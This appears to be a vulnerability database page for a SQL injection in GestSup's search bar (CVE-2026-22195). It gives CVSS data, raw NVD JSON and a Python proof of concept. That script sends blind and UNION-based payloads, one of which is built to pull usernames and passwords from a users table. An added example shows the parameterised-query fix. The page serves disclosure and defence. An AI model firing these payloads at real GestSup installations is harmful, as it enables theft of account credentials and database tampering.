Security Vulnerability Report
CVE-2026-22195 CVSS 8.1 HIGH

Published: 2026-01-09 17:15:55
Last Modified: 2026-01-14 19:37:22

Description

GestSup versions prior to 3.2.60 contain a SQL injection vulnerability in the search bar functionality. User-controlled search input is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:* - VULNERABLE
GestSup < 3.2.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-22195 GestSup SQL Injection PoC
# Target: GestSup < 3.2.60
# Authentication required (low privilege user)


def exploit_sql_injection(target_url, session_cookie):
    """
    SQL Injection PoC for CVE-2026-22195
    This demonstrates the vulnerability in search bar functionality
    """
    headers = {
        'Cookie': f'PHPSESSID={session_cookie}',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Basic injection test - using time-based blind SQL injection
    # The search parameter is vulnerable to SQL injection

    # Test payload 1: Basic injection check
    payload_normal = "test'"

    # Test payload 2: Time-based blind SQLi (MySQL)
    payload_blind = "test' AND (SELECT 1 FROM (SELECT SLEEP(5))x) AND '1'='1"

    # Test payload 3: UNION-based injection to extract database version
    payload_union = "test' UNION SELECT NULL,NULL,@@version,NULL,NULL-- "

    # Test payload 4: Extract user credentials from database
    payload_extract = "test' UNION SELECT NULL,username,password,email,NULL FROM users-- "

    endpoints = [
        '/search.php',
        '/index.php?page=search',
        '/ajax/search.php'
    ]

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"[*] Testing endpoint: {url}")

        # Test normal input first
        data = {'search': payload_normal}
        try:
            resp = requests.post(url, data=data, headers=headers, timeout=10)
            print(f"[+] Normal request sent, status: {resp.status_code}")
        except Exception as e:
            print(f"[-] Error: {e}")
            continue

        # Test blind SQL injection
        print(f"[*] Testing blind SQL injection...")
        data = {'search': payload_blind}
        try:
            resp = requests.post(url, data=data, headers=headers, timeout=15)
            print(f"[+] Blind SQLi payload sent")
        except requests.exceptions.Timeout:
            print("[!] Request timed out - SQL injection likely successful!")
        except Exception as e:
            print(f"[-] Error: {e}")

    return True


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>")
        print(f"Example: python {sys.argv[0]} http://victim.com/gestsup abc123def456")
        sys.exit(1)

    target = sys.argv[1]
    cookie = sys.argv[2]

    print(f"[*] CVE-2026-22195 GestSup SQL Injection PoC")
    print(f"[*] Target: {target}")
    exploit_sql_injection(target, cookie)
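The description attributes the flaw to search input being incorporated into the SQL text. The following is an added example, not GestSup's code and not part of the original record, contrasting that pattern with a bound parameter. It assumes a LIKE-based search and uses a constructed SQLite schema and hypothetical function names, none of which the page confirms.

```python
import sqlite3

def make_db():
    """Constructed in-memory data; table names are not GestSup's schema."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tickets(id INTEGER, title TEXT);
        CREATE TABLE accounts(login TEXT, secret TEXT);
        INSERT INTO tickets VALUES (1, 'test printer'), (2, '100% cpu on host');
        INSERT INTO accounts VALUES ('admin', 'constructed-secret');
    """)
    return db

def search_concat(db, term):
    """Weak form (CWE-89): the search term becomes part of the SQL text."""
    sql = "SELECT id, title FROM tickets WHERE title LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()

def search_bound(db, term):
    """Hardened form: the term is bound as data; LIKE wildcards are escaped."""
    esc = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT id, title FROM tickets WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + esc + "%",)).fetchall()

def compare(term):
    """Run one search term through both forms; a SQL error is reported as text."""
    db = make_db()
    results = {}
    for name, fn in (("concat", search_concat), ("bound", search_bound)):
        try:
            results[name] = fn(db, term)
        except sqlite3.OperationalError as exc:
            results[name] = "SQL error: " + str(exc)
    return results

if __name__ == "__main__":
    # Inputs shaped like the PoC's payloads, adapted to the constructed schema.
    for term in ("test", "test'", "%",
                 "test' UNION SELECT login, secret FROM accounts-- "):
        print(repr(term), compare(term))
```

Binding the term closes the injection; escaping `%` and `_` is a separate, search-specific step that keeps user-supplied wildcards literal.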

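References

https://gestsup.fr/index.php?page=changelog (Release Notes)
https://www.vulncheck.com/advisories/gestsup-sqli-in-search-bar (Third Party Advisory)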

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22195", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:54.903", "lastModified": "2026-01-14T19:37:21.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GestSup versions prior to 3.2.60 contain a SQL injection vulnerability in the search bar functionality. User-controlled search input is incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges."}, {"lang": "es", "value": "Las versiones de GestSup anteriores a la 3.2.60 contienen una vulnerabilidad de inyección SQL en la funcionalidad de la barra de búsqueda. La entrada de búsqueda controlada por el usuario se incorpora en las consultas SQL sin neutralización suficiente, permitiendo a un atacante autenticado manipular las consultas de la base de datos. 
La explotación exitosa puede resultar en acceso no autorizado o modificación de los contenidos de la base de datos, dependiendo de los privilegios de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.56", "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"}]}]}], "references": [{"url": "https://gestsup.fr/index.php?page=changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/gestsup-sqli-in-search-bar", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}